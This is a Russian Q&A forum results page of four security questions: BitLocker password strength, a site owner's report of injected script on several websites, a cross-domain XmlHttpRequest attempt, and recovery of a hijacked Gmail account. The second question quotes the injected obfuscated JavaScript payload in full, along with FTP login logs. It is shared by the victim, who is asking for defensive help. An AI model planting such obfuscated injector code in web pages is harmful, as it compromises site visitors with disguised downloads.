Найдено результатов: 4

Насколько эффективно использование BitLocker для полного шифрования диска? Нужен ли сложный пароль?

Система


Ноутбук с установленной Windows 7 Ultimate и, соответственно, возможностью включить полное шифрование диска. При этом, как известно, создается (если по какой-либо причине не был создан при установке) новый раздел объемом примерно 200 Mb, на котором система хранит некоторый набор системных файлов, необходимых для запуска Windows — данный раздел не шифруется.

Ключ шифрования хранится в TPM-чипе. Если в ноутбуке отсутствует TPM-чип, используется метод загрузки со вставленным usb-flash, на котором хранится ключ шифрования.

Способ загрузки ключа шифрования с флэшки кажется даже безопаснее, т.к. без флэшки Windows откажется загружаться в принципе.

Вопрос: Необходимо ли ставить сложный пароль на вход в Windows?


Как я понимаю, все данные шифруются с использованием файла-ключа и пароля на вход в систему. Что будет, если загрузится с одного из многочисленных дисков для сброса пароля и сбросить пароль? Как я понимаю, данные будут безвозвратно утеряны, ну или как минимум недоступны с новым паролем.

Соответственно, при условии что пароль не настолько легкий, чтобы его можно было вручную подобрать в log on screen, то вроде бы можно не заботиться о его сложности и длине.

Однако, как я понимаю, т.к. Windows не расшифровывает зашифрованные данные до ввода пароля, то очевидно файл с хэшем пароля хранится на незашифрованном разделе. Соответственно его можно скопировать и дальше уже как обычно взламывать пароль подбором. В таком случае, к сложности пароля стоит относится как обычно — с должным вниманием.

Не смог найти документацию о том, как же технически работает BitLocker, поэтому спрашиваю, не знает ли кто, прав ли я в своих рассуждения и догадках.

Спасет ли относительно легкий, но поддающийся брут форсу пароль при использовании BitLocker для полного шифрования всех дисков, включая системный?

Пароли   Шифрование   Windows   BitLocker   Защита   от   взлома    

386   6   04:11, 13th August, 2020


Взлом сайтов. Вставлен произвольный код?

Добрый день!


На днях на нескольких сайтах на CodeIgniter, одном на Joomla, одном на Wordpress и на одном совсем без CMS был установлен произвольный код в файлах index.*, home.*, page.*, auth.*. Т.е. в каждый из файлов был установлен тег script с произвольным кодом. Внешне это отображалось как приглашение установить новую мультимедийную плюшку для браузера.


Собственно, сам скрипт (без! знака в слове script и без переводов строки — не умещался):
<pre><code class="javascript">&lt;sc!ript type=&quot;text/javascript&quot; language=&quot;javascript&quot;&gt;
wkllp=&quot;33933333339999333999339939993933
399993393993993339933939339333333999393339999339399933333
993393933999939339333933999393339933939399993333999393333
939999399333993999339939993399339333933399999333933399399
939333993393939993339399339333993939933933333399993993999
399939939339399339333999393339939333339993933393333333993
333399933333999933333999399399393333993393939939339399339
993993933339993933339993933393333333993333399933333999933
333999399399339933999339339933339399399393993393939933393
399399993999339339933933399339393999339333999393339333333
993999339939999339993993999399339939339399933993993933939
933393399393393993993339939339399939333999933933999393339
333333993933339939339399339333993393339933939399399933399
939939999939339999333393999939993399399939333999933939939
933399339393399999333999933399393393993399339993393399333
393993993939933939339333333993933939933933339999393393339
339993933399339393999333939933933399393993393339333933333
399933993999339339933399339999393393339339939333399939333
999393339993333339993933393999933939999399339933999399939
993339399933393999399939933939399339393999339339933999339
933993393999339933399399399993393999339933399399333993393
999939933339399339333393999339939393399933333993399933933
393339999933399993333939999399393393993399339993393399333
39399399393993393933999993&quot;;znanx=100;wdlgs=this;nsjvu=&quot;i&quot;+&quot;te&quot;;
vurba=116;nqcs=&quot;wr&quot;+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && 
gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o=&quot;&quot;;
imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf&lt;wkllp.length){
bnehf=0;for(mkrku=0;mkrku&lt;8;mkrku++){bnehf=bnehf&lt;&lt;1;if(
wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;
qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}&lt;/sc!ript&gt;



Прямой связи CI-Joomla-WP-чистыйHTML я не вижу. Т.е. видимо, это не критическая уязвимость в каком-либо движке.


В логах апача странных запросов или даже каких-либо запросов во время модификации файла нет (+-10минут).


Подозрительно выглядят логи auth.log (настоящий username изменен; ip, с которого пришел запрос — нет):
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
<br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.



SSH закрыт фаерволом для всех, кроме меня.


Хочу задать вопрос — что это может быть? Как этого избежать? Какие еще логи нужны для анализа?

Защита   от   взлома   ActionScript   Журналирование    

342   13   04:16, 20th August, 2020


Cross Domain XmlHttpRequest

Добрый день, друзья.

Целый день сегодня мучаюсь с вышеозначенной темой. Изначальная задача:
Выполняясь на site.com отправить POST запрос (даже ответ не обязательно получать) на xxx.site.com. В крайнем случае готов ограничиться браузером Google Chrome.

Казалось бы, задача уже не нова, написана куча материалов на тему, но что-то ничего не срабатывает…

Итак, что я уже попробовал:
  1. подменить document.domain перед отправкой. Как оказалось, менять с xxx.site.com на site.com можно, а вот обратно — никак...
  2. создать iframe с src=«xxx.site.com», а затем внутри него добавить в дом модель тег script, который будет содержать в себе логику по отправлению XmlHttpRequest. И вот этот вариант уже почти-почти сработал, как по непонятным мне причинам xhr.readystatechange вызывается один раз и readyState=1… Код примерно такой:
    var iframe = $('<iframe src=«xxx.site.com» style=«display:none;»></iframe>').appendTo(document.body);
      var iDoc = iframe.get(0).contentDocument;
      var script = iDoc.createElement(«script»);
      script.setAttribute(«type», «text/javascript»);
      script.innerHTML =
          «function postIt() {» +
          «var xhr = new XMLHttpRequest();» +
          «xhr.onreadystatechange = function(data) {» +
              «alert(xhr.readyState);» +
          «if (xhr.readyState == 4) {» +
          "    if (xhr.status == 200) {" +
          "     alert(data.toString());" +
          "    } else {" +
          "     alert(xhr.error);" +
          "    }" +
          "}};" +

          «var url = \»xxx.site.com\";" +

          «var postParams = \»a=1&b=1\"" +

          «xhr.open(\»POST\", url, true);" +
          «xhr.setRequestHeader(\»Content-Type\", \«application/x-www-form-urlencoded;\»);" +
          «xhr.send(postParams);» +
        "}" +

        «postIt();»;

      iDoc.body.appendChild(script);


    * This source code was highlighted with Source Code Highlighter.

  3. Также рассмотрел способ с YQL — не подошло

Какие есть еще идеи как это побороть?

JavaScript   Защита   от   взлома    

451   8   07:27, 1st October, 2020


Что делать если взломали E-mail

У моего друга взломали E-mail (GMail) и заблокировали доступ к нему.
Есть конкретный подозреваемый (исполнитель или заказчик) человек.

Хотелось бы у вас спросить совета, каким образом можно восстановить доступ к почте? Куда нужно обращаться? Обязательно ли ехать в офис российского Гугл? Какой алгоритм действий по восстановлению контроля?

А во-вторых, под какие статьи УК РФ попадают данные деяния? Что нужно сделать для возбуждения уголовного дела и что необходимо для того, чтобы доказаться причастность подозреваемого к совершению данного преступления?

Заранее премного благодарен за советы!

Gmail   Защита   от   взлома   Восстановление   данных    

302   3   19:06, 1st October, 2020